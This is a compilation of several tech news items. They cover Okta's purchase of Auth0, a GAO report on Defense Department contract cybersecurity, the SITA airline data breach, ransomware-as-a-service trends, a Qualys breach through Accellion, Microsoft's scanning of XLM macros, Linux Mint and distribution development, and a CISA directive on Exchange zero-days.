Information Technology

Yesterday, identity and access management (IAM) vendor Okta announced plans to acquire customer identity and access (CIAM) vendor Auth0 for $6.5B in an all-stock transaction. Founded in 2013, Auth0 has been rapidly growing its developer-focused offering and has raised more than $330 million in venture financing. Based on Forrester’s estimates of Auth0’s annual revenue, this acquisition price is around an 80-100X revenue multiple, which is considerable and unprecedented in the Identity Access management (IAM) space. For reference, we estimated that Cisco’s acquisition of Duo in 2018 was around a 20X revenue multiple and was done as a cash transaction. With this purchase and valuation, Okta is raising its bet and going all in on CIAM. 
Also: Okta and Auth0: A $6.5 billion bet that identity will warrant its own cloud

In Forrester’s opinion, this high acquisition price reflects that: 
Secure and easy-to-use digital experiences are a must going forward. Even before COVID-19 pushed many companies to all-digital customer interactions, organizations were investing heavily in building and optimizing digital experiences that provided great user experience without sacrificing on security or privacy. While companies may have previously tried this using homegrown or open-source offerings, the pace and velocity of digital transformation requires companies to evaluate turnkey CIAM solutions that can be quickly integrated into existing architectures to support these new digital experiences. This deal reflects that strong overall demand for solutions such as Auth0 help deliver on this promise and positions Okta to leverage that growing demand. 
The 2020 tech stock market rally-up is an M&A accelerant. Okta’s stock has doubled in the last year as it and many other tech-related companies rode a surge in demand due to changing work conditions caused by the COVID-19 pandemic. These higher stock valuations now give public companies the ability to pursue large deals using the higher stock value. As tech stock prices continue to surge, expect more M&A and more all-stock-type transactions. 
Okta is under pressure to cater to developers in CIAM. With digital transformation accelerating, identity has become the cornerstone of customer acquisition, management, and retention — traditionally managed by digital product teams, business units, marketing organizations, and buyers’ internal application developers. Access to these organizations’ stakeholders and decision-makers (especially to the app developers) has always been Auth0’s strength. Auth0 gives Okta better access to this developer buying center that Okta has not been as successful reaching. 
IAM and CIAM markets remain highly competitive, with a wide range of vendors such as ForgeRock, SAP, IBM, Ping Identity, Salesforce, Microsoft, and Akamai, to name a few.  

While Okta has built a strong leadership position in workforce IAM, the success of this merger will depend on the following: 
How successfully Okta can further integrate Auth0 with non-IAM and non-security solutions. In CIAM, integration with analytics, business intelligence, portals, and marketing solutions are critical to keep a CIAM platform relevant. Okta will have to expand its application ecosystem quickly to remain competitive and to support these new integrations. 
How much of a premium customers are willing to pay for identity orchestration. Auth0 had a lot of success through its freemium platform offering, which gave developers easy access to CIAM capabilities. A key factor in the financial success of the acquisition will be Okta’s ability to convert these freemium Auth0 customers into revenue-generating customers ,especially when some other vendors include orchestration for free. 
How well can Okta apply Auth0 CIAM technology to its existing workforce IAM solution. Okta’s DNA has been providing employee access to cloud apps using its cloud portal — which traditionally has required little orchestration. As Okta expands into protecting legacy on-premises apps and replacing existing on-premises solutions from Broadcom/CA, Oracle, and IBM and starts to compete more with ForgeRock and Ping Identity, Auth0’s orchestration technology will be a critical building block. 
How well Okta will tolerate and integrate Auth0’s completely different corporate culture. Auth0’s IAM approach has been original, innovative, and technology-led. Okta’s traditional approach has been business-, execution-, and financial-results-focused. As with many similar past IAM acquisitions, the acquiring company must retain the acquired vendor’s product management and engineering team and continue to innovate — which historically has been a challenging task for many acquisitions. 
How quickly and well Okta will eliminate overlaps to provide the best single CIAM solution. When an acquisition happens, there are usually and naturally significant overlaps between the acquiring and acquired vendors’ solutions. In this case, passwordless authentication, multifactor authentication, and even some of Okta’s preexisting developer-centric APIs overlap with Auth0’s offering. Swiftly arriving at a unified, consolidated solution to minimize customer confusion and maximize Okta’s engineering performance is critical to success. 
To understand the business and technology trends critical to 2021, download Forrester’s complimentary 2021 Predictions Guide here. 
This post was written by Principal Analyst Andras Cser, VP and Research Director Merritt Maxim, and Senior Analyst Sean Ryan, and it originally appeared here.  More

In a new report released Thursday, the U.S. Government Accountability Office (GAO) said the Department of Defense fails to communicate clear cybersecurity guidelines to contractors tasked with building systems for its weapons programs. 

As part of its so called congressional watchdog duties, the GAO found that Defense Department weapons programs are failing to consistently incorporate cybersecurity requirements into contract language. 
For instance, three out of five contracts reviewed by the GAO had no cybersecurity requirements written into the contract language when they were awarded, with only vague requirements added later. And out of the four military service branches, only the Air Force has a record of issuing service-wide guidance on cybersecurity requirements in contracts. 
The GAO points out that the lack of clear cybersecurity guidance is problematic because defense contractors are only responsible for meeting terms that are written into a contract. In other words, if it’s not in the contract, it’s not getting built into the system.
As part of its recommendations, the GAO said that tailored cybersecurity requirements must be clearly defined in acquisition program contracts. The GAO also said the Defense Department should establish criteria for accepting or rejecting contracted work and for how the government will verify that requirements were met. 
The Defense Department has a vast network of sophisticated weapons systems that need to withstand cyberattacks in order to function when required. But the DOD also has a documented history of finding mission critical security vulnerabilities within those programs due to what the GAO says is a lack of focus on weapon systems cybersecurity. 
A GAO report from 2018 found that the DOD has historically focused its cybersecurity efforts on protecting networks and traditional IT systems. Since that report, the DOD has reportedly taken steps to make its network of high-tech weapon systems less vulnerable to cyberattacks.

“As we reported in 2018, DOD had not prioritized weapon systems cybersecurity until recently, and was still determining how best to address it during the acquisition process,” the report stated. “The department had historically focused its cybersecurity efforts on protecting networks and traditional IT systems, but not weapon systems, and key acquisition and requirements policies did not focus on cybersecurity. As a result, DOD likely designed and built many systems without adequate cybersecurity.”  More

Data belonging to 580,000 Singapore Airlines’ frequent flyer members have been compromised in a cybersecurity attack that originally hit air transport communications and IT vendor, SITA. The incident marks the second time in a week that an airline has reported a data breach, which appears also to be the result of the attack targeting SITA.
While not a customer of SITA, Singapore Airlines (SIA) had shared a “restricted” set of data as a member of the Star Alliance group, the airline said in a statement late-Thursday. This was necessary to facilitate verification of membership tier status and provide customers of other member airlines the relevant benefits while they travelled. 
Such data would reside on the passenger service systems of member airlines, SIA said. The national carrier did not specify when it was informed by SITA about the breach, which impacted the latter’s passenger service system servers. 

Global pandemic opening up can of security worms
Caught by the sudden onslaught of COVID-19, most businesses lacked or had inadequate security systems in place to support remote work and now have to deal with a new reality that includes a much wider attack surface and less secured user devices.
Read More

One member of Star Alliance had used this SITA system. The international airline alliance has 26 members, including Air Canada, United Airlines, and Lufthansa. 
Affected SIA customers were members of its KrisFlyer as well as higher tier PPS frequent flyer programme, the airline said, adding that compromised data was limited to the membership number and tier status, though, there were some instances in which membership name also was illegally accessed. 
The data leakage was relatively contained because these were the only details shared with the Star Alliance group. 
“Specifically, this data breach does not involve KrisFlyer and PPS member passwords, credit card information, and other customer data such as itineraries, reservations, ticketing, passport numbers, and email addresses,” the Singapore carrier said. “We would also like to reassure all customers that none of SIA’s IT systems have been affected by this incident.”

On its part, SITA released a statement on its website confirming the security breach was the result of “a highly sophisticated attack”. 
It said it ascertained the “seriousness” of the incident on February 24, after which it took “immediate action” to inform all affected customers. Adding that it deployed “targeted” containment measures, SITA said its security incident response team was investigating the breach alongside external cybersecurity experts. 
In an email response to ZDNet’s questions, a SITA spokesperson declined to say when the breach was first discovered internally prior to the February 24 notification, citing “tactical and security reasons”. She reiterated that investigations and forensic work were ongoing, and was unable to confirm how compromised systems were infiltrated. 
She also would not reveal which other organisations were impacted by the breach or the types of data that was compromised, as it still was in the process of informing all affected parties. 
She did, however, point to several airlines that already had reached out to their customers and made public statements confirming they were affected by the data breach. These included Jeju Air, Finnair, and Malaysia Airlines, she said. 
This indicated that SITA was involved in a breach reported earlier this week that affected Malaysia Airlines’ Enrich frequent flyer members. While it had yet to make a public statement on the security incident, the airline told Enrich members it was the result of an attack that targeted a third-party IT service provider, which it did not name. 
In its note, which offered scant details of the breach, Malaysia Airlines said compromised information had included date of birth and contact information between the period of March 2010 and June 2019. 
In her response to ZDNet, the SITA spokesperson clarified that this timeframe referred to the date during which the compromised data was registered. It did not refer to the length of the window of compromise, which she revealed to be less than a month. 
According to SITA, the vendor has 2,800 customers including airlines, airports, and government agencies. Pre-pandemic, 146 million passengers used its in-flight mobile service, it said. 
RELATED COVERAGE More

Ransomware as a service is proving effective for cyber criminals who want a piece of the cyber-extortion action but without necessarily having the skills to develop their own malware, with two out of three attacks using this model.
Ransomware attacks are still proving extremely lucrative, with the most well-organised gangs earning millions per victim, so many cyber criminals want to cash in – but don’t have the ability to code and distribute their own campaigns.

More on privacy

That’s where ransomware as a service (RaaS) comes in, with developers selling or leasing malware to users on dark web forums. These affiliate schemes provide low-level attackers with the ability to distribute and manage ransomware campaigns, with the developer behind the ransomware receiving a cut of each ransom victim’s pay for the decryption key.
SEE: A winning strategy for cybersecurity (ZDNet special report) | Download the report as a PDF (TechRepublic)
Researchers at cybersecurity company Group-IB have detailed that almost two-thirds of ransomware attacks analysed during 2020 came from cyber criminals operating on a RaaS model.
Such is the demand for ransomware as a service, that 15 new ransomware affiliate schemes appeared during 2020, including Thanos, Avaddon, SunCrypt, and many others.
Competition among ransomware developers can even lead to the authors providing special deals to wannabe crooks, which is more bad news for potential victims.

“Affiliate programs make this kind of attack more attractive for cybercriminals. The tremendous popularity of such attacks made almost every company, regardless of their size and industry, a potential victim,” Oleg Skulkin, a senior digital forensics analyst at Group-IB, told ZDNet.
“Companies had to provide their employees with the capability to work remotely and we saw an increase in the number of publicly accessible RDP servers. Of course, nobody thought about security and many of such servers became the points of initial access for many ransomware operators,” said Skulkin.
However, despite the success of ransomware attacks and RaaS schemes it’s possible to help protect against falling victim to them with a handful of cybersecurity procedures – including avoiding the use of default passwords limiting public access to RDP.
“RDP-related compromise can easily be mitigated with the help of some simple but efficient steps like the restriction of IP addresses that can be used to make external RDP connections or setting limits on the number of login attempts within a certain period of time,” said Skulkin.
SEE: Cybercrime groups are selling their hacking skills. Some countries are buying
Organisations can also help protect the network from ransomware and other attacks via the use of multi-authentication to limit the access an attacker can get if they do breach an account, while applying security patches as soon as possible after they’re released prevents criminals from being able to exploit known vulnerabilities.
All of this can help prevent organisations from falling victim to ransomware attacks in the first place – and cut off the need to pay ransoms and encourage ransomware schemes.
“As long as companies pay ransoms, determined only by attackers’ appetite, such attacks will continue to grow in numbers and scale and are likely to become more sophisticated,” Skulkin concluded.
MORE ON CYBERSECURITY More

Qualys has revealed that a “limited” number of customers may have been impacted by a data breach connected to an Accellion zero-day vulnerability.

The cloud security and compliance firm said on Wednesday that the security incident did not have any “operational impact,” but “unauthorized access” had been obtained to an Accellion FTA server used by the company. 
Accellion File Transfer Appliance (FTA) is enterprise-grade software used for file transfers. In December 2020, FireEye’s Mandiant discovered that the Clop ransomware group was exploiting previously-unknown vulnerabilities in the legacy software to extort organizations, threatening to leak sensitive data stolen from vulnerable servers unless a ransom was paid. 
Organizations across the US, Singapore, Canada, and the Netherlands were targeted. However, according to Mandiant, ransomware was not deployed in this wave of attacks. 
Qualys is a user of Accellion FTA. The company says that the software was used “to transfer information as part of our customer support system [in] a segregated DMZ environment” but was kept separate from production environments, codebases, and Qualys Cloud. 
A hotfix to patch the vulnerabilities was issued by Accellion on December 21, and Qualys says that its team applied the fix on December 22. 
However, a zero-day vulnerability in the third-party software had already been exploited, and on December 24, the company received an “integrity alert” indicating a potential compromise. 

The impacted server was isolated from its network and an investigation was launched. Qualys found that some customer data contained in the server had been accessed, although the company has not revealed how many customers are involved, or what information was stored. 
Qualys has hired Mandiant, which is also working with Accellion, to investigate. In addition, affected servers have been closed down and alternatives are being offered to customers. 
“As a security company, we continue to look for ways to enhance security and provide the strongest protections for our customers,” the company says. “Qualys is strongly committed to the security of its customers and their data, and we will notify them should relevant information become available.”
Accellion says it has worked “around the clock to develop and release patches that resolve each identified FTA vulnerability and support our customers affected by this incident.”
Previous and related coverage
Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

Macro malware has been a popular choice for hackers since the 1990s and even in recent years the technique has continued to be a simple way of delivering malware to the unwary. 
Just last month, Ukraine accused Russian government spies of uploading documents with malicious macros to a Ukrainian government document-sharing site. And amid the first wave of the COVID-19 pandemic, Microsoft warned of emails containing Excel files with malicious macros. 

Microsoft Ignite

Microsoft has been using an integration between its Antimalware Scan Interface (AMSI) and Office 365 to knock out macro malware for years, but its successful efforts to take out macro scripts written in Visual Basic for Applications (VBA) ended up pushing attackers to an older macro language called XLM, which came with Excel 4.0 in 1992.  
SEE: Windows 10 Start menu hacks (TechRepublic Premium)
Now Microsoft is expanding the integration of its AMSI with Office 365 to include the scanning of Excel 4.0 XLM macros at runtime, bringing AMSI in line with VBA.
AMSI allows applications to integrate with any antivirus on a Windows machine to enable the antivirus to detect and block a range of malicious scripts in Office documents. Microsoft notes its Defender anti-malware is using this integration to detect and block XLM-based malware and is encouraging other anti-malware providers to adopt it, too. 
Although XLM was superseded by VBA in 1993, XLM is still used by some customers and so it remains supported in Excel.  

“While more rudimentary than VBA, XLM is powerful enough to provide interoperability with the operating system, and many organizations and users continue to use its functionality for legitimate purposes. Cybercriminals know this, and they have been abusing XLM macros, increasingly more frequently, to call Win32 APIs and run shell commands,” explain Microsoft’s security teams. 
The arrival of AMSI’s VBA runtime scan in 2018 “effectively removed the armor that macro-obfuscation equipped malware with, exposing malicious code to improved levels of scrutiny,” says Microsoft. 
“Naturally, threat actors like those behind Trickbot, Zloader, and Ursnif have looked elsewhere for features to abuse and operate under the radar of security solutions, and they found a suitable alternative in XLM,” it continues. 
SEE: Cybercrime groups are selling their hacking skills. Some countries are buying
If the antivirus detects a malicious XLM macro, the macro won’t execute and Excel is terminated, thus blocking the attack. 
Runtime inspection of XLM macros is now available in Microsoft Excel and is enabled by default on the February Current Channel and Monthly Enterprise Channel for Microsoft 365 subscription users.
Microsoft More

I regularly read the Linux Mint Blog, not only because it is useful to keep up with what is happening with the Linux Mint distribution but also because it occasionally gives very interesting insights into the development and maintenance of a Linux distribution in general, and the Linux Mint distribution(s) in particular.  
To be honest, I was disappointed some years ago when Clem (Clement Lefebvre) discontinued his Segfault blog, because it always contained good technical information and interesting insights.

Open Source

Anyway, two recent posts to the Mint Blog are very good examples of the kind of thing I am talking about. The first, titled Update Your Computer!, is a discussion of the importance of installing updates, but in my opinion it is one of the best posts I have read in quite some time, because it is not just the usual “security updates are important/easy/safe” sermon, it also includes examples and statistics taken from the Mint distribution itself, and it examines some of the issues around running end-of-life versions that generally don’t get any updates at all.
SEE: Hiring Kit: Python developer (TechRepublic Premium)
The Linux Mint Update utility is one of the best available in my opinion, and it is obvious that the Mint developers have put a lot of effort into it over many years, continuously improving and extending it. It not only does the basic job of downloading and installing updates, it puts a lot of effort into making the update process clear and easier to understand and manage, and monitoring various aspects of the system to try to help with effective and secure administration. I am old and stubborn, and I still tend to use CLI utilities for updates on most systems (apt on Debian and derivatives, dnf on Fedora, pacman on Arch and derivatives), but I realized quite some time ago that Mint Update did a better job overall than I could do manually.
I strongly recommend reading this blog post, and not only for those who actually run or manage Linux Mint systems. There is a lot of food for thought – and reasons for action – in it.
The other Mint Blog post was the regular Monthly News – February 2021. It discusses some of the upcoming improvements in the Mint Update Manager, again including not only the “what” but also the “why” behind them. It also goes into more detail about some of the most recent bug fixes, with a lot more information about the cause and effect of a few of them. For example, I mentioned the UsrMerge update in my recent post about Linux Mint 20.1; this blog post explains a rather nasty bug, which is caused by that relating to reproducible builds.

Reading those blog posts, and thinking about the issues that they bring up and the actions they have produced, got me thinking about Linux distributions in general. Mint is based on Ubuntu (I know, don’t worry about LMDE for this discussion), which in turn is itself based on Debian GNU/Linux. 
That means a lot of the low-level stuff, such as the package base, the repositories, and most of the integration and compilation issues, are handled by those “upstream” distributions. The Mint developers concentrate on integration of other packages from other sources that are not included in the upstream base distribution, such as non-FOSS or other third-party packages, and the Mint development team actually produces significant new portions of the distribution, such as the Cinnamon desktop, the Mint Update Manager, and XApps to name just a few. That requires a lot of human resources – just take a look at the Linux Mint Teams page, where it lists five teams responsible for various aspects of the distribution.
While other distributions, which are derived from larger upstream distributions, such as the numerous Ubuntu derivatives, or Arch Linux derivatives, or even others derived directly from Debian, generally do a lot less original development, they are still able to concentrate their efforts on things like desktop integration, artwork and third-party package integration, while building on the solid and (hopefully) stable foundation of their upstream distribution.
On the other hand, my last couple of posts were about “independent” Linux distributions (such as Solus and KaOS), which are not based on or derived from any other distribution. 
They take on the responsibility of creating the entire distribution from scratch – compiling, packaging, integrating, creating and maintaining repositories and much more. There are decisions to be made about package format, software update mechanisms, desktop(s) to be supported, and on and on. That in itself requires a lot of work, and a lot of technical expertise and experience.
So what does all of this mean to someone who is trying to decide on a Linux distribution to use, or at least to try out?  
Well, at one end of the scale the large, established distributions such as Debian, Fedora, openSUSE and their major derivatives, such as Linux Mint, offer stability, predictability and very extensive testing before release (note that I omitted Ubuntu here, because in my opinion they lose out on predictability due to their very serious ‘not invented here’ syndrome, and their tendency over the years to unnecessarily reinvent things and go wandering off on a long tangent before suddenly deciding to scrap it and jump back onto the mainstream path after all). End-user support from these distributions is likely to be good, but rather slow-moving from the user perspective.
SEE: Hands-On: Adventures with Ubuntu Linux on the Raspberry Pi 4
At the other end of the scale, the independent distributions such as Solus, KaOS and PCLinuxOS are generally more focused on their original concept, which might be a specific desktop/development environment, or a specific target audience or application. If that focus matches your interest, then you are likely to feel much closer to the developers, rather than feeling like you are “just one of the potentially large number of users”. Because of the smaller size of the development/maintenance team, independent distributions are likely to be more “agile”, getting updates and new developments integrated and released faster, and end-user support is generally more responsive and often more personal.
In closing, I would say that I admire a lot of the people at both ends of this scale. It takes a great deal of talent, knowledge, dedication and plain old hard work to produce a good Linux distribution. 
Clem, in particular, has been one of my heroes for a very long time (since about release 2.something), and Adam W. since the Mandriva days. Those who have established and maintained independent distributions for years are deserving of just as much credit and appreciation, but they often don’t get it.  
Kudos to them. More

The US Cybersecurity and Infrastructure Security Agency (CISA) has issued an emergency directive following the release of fixes for zero-day vulnerabilities in Microsoft Exchange. 

ZDNet Recommends

The US agency’s Emergency Directive 21-02, “Mitigate Microsoft Exchange On-Premises Product Vulnerabilities,” was issued on March 3. 
This week, Microsoft warned that four zero-day vulnerabilities in Exchange Server 2013, Exchange Server 2016, and Exchange Server 2019 are being actively exploited by a suspected state-sponsored advanced persistent threat (APT) group from China called Hafnium. 
Exchange Online is not affected by the bugs. However, Exchange Server is software used by government agencies and the enterprise alike, and so Microsoft’s warning to apply provided patches immediately should not be ignored. 
In light of this, CISA’s directive — made through legal provisions for the agency to issue emergency orders to other US government bodies when serious cybersecurity threats are detected — demands that federal agencies tackle the vulnerabilities now. 
CISA says that partner organizations have detected “active exploitation of vulnerabilities in Microsoft Exchange on-premise products.”
“Successful exploitation of these vulnerabilities allows an attacker to access on-premises Exchange Servers, enabling them to gain persistent system access and control of an enterprise network,” the agency says. 

CISA believes the vulnerabilities present an “unacceptable risk to Federal Civilian Executive Branch agencies,” and so action is now required. 
The emergency directive has stipulated that agencies must begin triaging their network activity, system memory, logs, Windows event logs, and registry records to find any indicators of suspicious behavior. 
If there are no indicators of compromise (IoCs), patches need to be immediately applied to Microsoft Exchange builds. However, if any activity is of note, US departments must immediately disconnect their Microsoft Exchange on-premises servers and report their findings to CISA for further investigation.
“This Emergency Directive remains in effect until all agencies operating Microsoft Exchange servers have applied the available patch or the Directive is terminated through other appropriate action,” the agency added. 

Previous and related coverage
Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More